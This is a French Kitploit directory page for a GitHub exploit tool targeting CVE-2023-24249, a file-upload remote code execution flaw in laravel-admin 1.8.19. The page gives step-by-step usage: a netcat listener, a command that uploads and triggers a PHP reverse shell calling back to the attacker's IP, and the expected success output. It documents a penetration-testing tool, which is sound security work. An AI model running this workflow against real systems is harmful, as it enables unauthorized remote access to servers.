Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-24249-Exploit — Script d'exploitation pour CVE-2023-24249 - une vulnérabilité permettant l'exécution de code à distance via le téléversement de fichiers et l'injection de commandes. | Kitploit
Outils/GitHubGitHub/iduzzel/cve-2023-24249-exploit
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubiduzzel/cve-2023-24249-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-24249-Exploit

Script d'exploitation pour CVE-2023-24249 - une vulnérabilité permettant l'exécution de code à distance via le téléversement de fichiers et l'injection de commandes.

Voir le dépôt
91il y a 2 ansPas encore vérifié

Script d'exploit CVE-2023-24249

Description

Ce dépôt contient un script d'exploit pour CVE-2023-24249, une vulnérabilité critique présente dans laravel-admin version 1.8.19. Cette vulnérabilité permet un téléchargement de fichiers arbitraires, permettant aux attaquants d'exécuter du code arbitraire via un fichier PHP spécialement conçu. L'exploit démontre comment un attaquant peut télécharger un reverse shell vers l'application cible et l'exécuter pour obtenir un accès distant.

Détails de la vulnérabilité

CVE-2023-24249 est une vulnérabilité de téléchargement de fichiers arbitraires dans laravel-admin v1.8.19. Cette vulnérabilité permet aux attaquants de télécharger et d'exécuter des fichiers PHP arbitraires, conduisant à une exécution de code à distance potentielle.

  • Score de base : 7.2 HIGH
  • Vecteur : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
  • Énumération des faiblesses : CWE-434 - Téléchargement de fichier sans restriction de type dangereux

Références

  • Exploit - Avis tiers
  • Dépôt GitHub de Laravel Admin
  • Site web officiel de Laravel Admin

Script d'exploit

Le script d'exploit fourni automatise le processus d'exploitation de CVE-2023-24249. Il effectue les étapes suivantes :

  1. Authentification : se connecte à l'application cible en utilisant les identifiants fournis.
  2. Envoi du reverse shell : téléverse un script reverse shell PHP via la fonctionnalité vulnérable de téléchargement de fichiers.
  3. Exécution du reverse shell : envoie une requête GET au script reverse shell téléversé pour l'exécuter et établir une connexion de retour vers la machine de l'attaquant.

Prérequis

  • Python 3
  • La bibliothèque requests
  • La bibliothèque beautifulsoup4

Installez les bibliothèques requises avec pip :

root@kitploit:~
pip install requests beautifulsoup4

Utilisation

  1. Clonez le dépôt :

    root@kitploit:~
    git clone https://github.com/IDUZZEL/CVE-2023-24249-Exploit.git
    cd CVE-2023-24249-Exploit
    
  2. Démarrez un listener sur votre machine :

    root@kitploit:~
    nc -lvnp <PORT>
    
  3. Exécutez le script d'exploit :

    root@kitploit:~
    python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -i <YOUR_IP> -p <YOUR_PORT>
    

    Remplacez <TARGET_URL>, <USERNAME>, <PASSWORD>, <YOUR_IP> et <YOUR_PORT> par les valeurs appropriées :

    • <TARGET_URL> : l'URL de l'application cible.
    • <USERNAME> : le nom d'utilisateur pour l'authentification.
    • <PASSWORD> : le mot de passe pour l'authentification.

Exemple

root@kitploit:~
python3 exploit.py -u http://admin.iduzzel.com -U admin -P iduzzel -i 10.10.14.13 -p 1337

Sortie du script

Si l'exploit réussit, le script affichera :

root@kitploit:~
[+] Reverse shell uploaded successfully! Attempting to execute it...
[+] Reverse shell executed successfully! Check your listener at <YOUR_IP>:<YOUR_PORT>

Avertissement

Ce script est destiné uniquement à des fins éducatives. Toute utilisation non autorisée de ce script contre un système sans autorisation explicite est illégale et contraire à l'éthique. L'auteur n'est pas responsable de tout usage abusif ou dommage causé par ce script.

Télécharger l’outil
  • <YOUR_IP> : votre adresse IP pour recevoir la connexion du reverse shell.
  • <YOUR_PORT> : le port sur lequel votre listener est en écoute.